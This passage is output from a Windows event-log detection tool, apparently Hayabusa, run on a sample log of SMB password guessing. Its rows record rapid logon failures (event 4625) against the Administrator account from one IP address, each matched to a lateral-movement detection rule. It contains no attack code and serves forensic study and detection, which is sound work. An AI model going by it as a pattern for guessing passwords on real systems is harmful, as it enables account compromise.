12112016-09-20 01:50:14.124 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12122016-09-20 01:50:14.159 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12132016-09-20 01:50:14.189 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12142016-09-20 01:50:14.228 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12152016-09-20 01:50:14.304 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12162016-09-20 01:50:14.345 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12172016-09-20 01:50:14.389 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12182016-09-20 01:50:14.427 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12192016-09-20 01:50:14.468 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12202016-09-20 01:50:14.503 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12212016-09-20 01:50:14.543 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12222016-09-20 01:50:14.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12232016-09-20 01:50:14.637 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12242016-09-20 01:50:14.673 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12252016-09-20 01:50:14.708 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12262016-09-20 01:50:14.748 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12272016-09-20 01:50:14.788 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12282016-09-20 01:50:14.824 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12292016-09-20 01:50:14.868 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12302016-09-20 01:50:14.905 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12312016-09-20 01:50:14.950 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12322016-09-20 01:50:15.004 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12332016-09-20 01:50:15.056 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12342016-09-20 01:50:15.096 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12352016-09-20 01:50:15.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12362016-09-20 01:50:15.168 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12372016-09-20 01:50:15.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12382016-09-20 01:50:15.254 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12392016-09-20 01:50:15.289 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12402016-09-20 01:50:15.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12412016-09-20 01:50:15.380 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12422016-09-20 01:50:15.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12432016-09-20 01:50:15.456 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12442016-09-20 01:50:15.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12452016-09-20 01:50:15.554 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12462016-09-20 01:50:15.595 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12472016-09-20 01:50:15.644 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12482016-09-20 01:50:15.685 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12492016-09-20 01:50:15.733 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12502016-09-20 01:50:15.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12512016-09-20 01:50:15.807 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12522016-09-20 01:50:15.852 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12532016-09-20 01:50:15.885 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12542016-09-20 01:50:15.924 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12552016-09-20 01:50:15.966 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12562016-09-20 01:50:16.012 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 3TlapK211UT8SO0W | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12572016-09-20 01:50:16.059 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Mzzw3uPkn2cgtmlF | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12582016-09-20 01:50:16.092 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: aPnfUjwJei5E5BD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12592016-09-20 01:50:16.133 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Mm1k0eeKAYokIbDg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12602016-09-20 01:50:16.166 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: w8TDNcJ3LMyNtUe1 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12612016-09-20 01:50:16.209 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: ogKKslkdXvc9f130 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12622016-09-20 01:50:16.252 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: sgoy6gMfe5N0UiP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12632016-09-20 01:50:16.289 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: lfjf3d6I8TsBOzvc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12642016-09-20 01:50:16.328 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Vs8DG8s81oOwYoI7 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12652016-09-20 01:50:16.427 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: LFkgN1aDoYkQ4qrT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12662016-09-20 01:50:16.459 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: KMwLokYpcFIYHegd | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12672016-09-20 01:50:16.507 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 6oKradBV4ERsQnKs | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12682016-09-20 01:50:16.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 0qPzlzfmgrbYTKqQ | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12692016-09-20 01:50:16.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: qKYlBm2lhobHzbjh | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12702016-09-20 01:50:16.623 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: DBMu96oqO9tb3f4O | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12712016-09-20 01:50:16.664 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: tO04Q3eYdzyuy51v | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12722016-09-20 01:50:16.701 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: FrIa2UrSrfdhkDCx | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12732016-09-20 01:50:16.741 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: axhhyMrGl95O16Vg | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12742016-09-20 01:50:16.783 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: atjvfi8QeEDluhL2 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12752016-09-20 01:50:16.827 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 9HPBZKUiiKeyQwSr | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12762016-09-20 01:50:16.872 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 2SmitfyjO4mxqw5E | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12772016-09-20 01:50:16.904 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: Nrq1g8ktTQbPTXqn | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12782016-09-20 01:50:16.947 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12792016-09-20 01:50:16.982 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12802016-09-20 01:50:17.023 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12812016-09-20 01:50:17.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12822016-09-20 01:50:17.099 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12832016-09-20 01:50:17.148 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12842016-09-20 01:50:17.192 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12852016-09-20 01:50:17.237 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
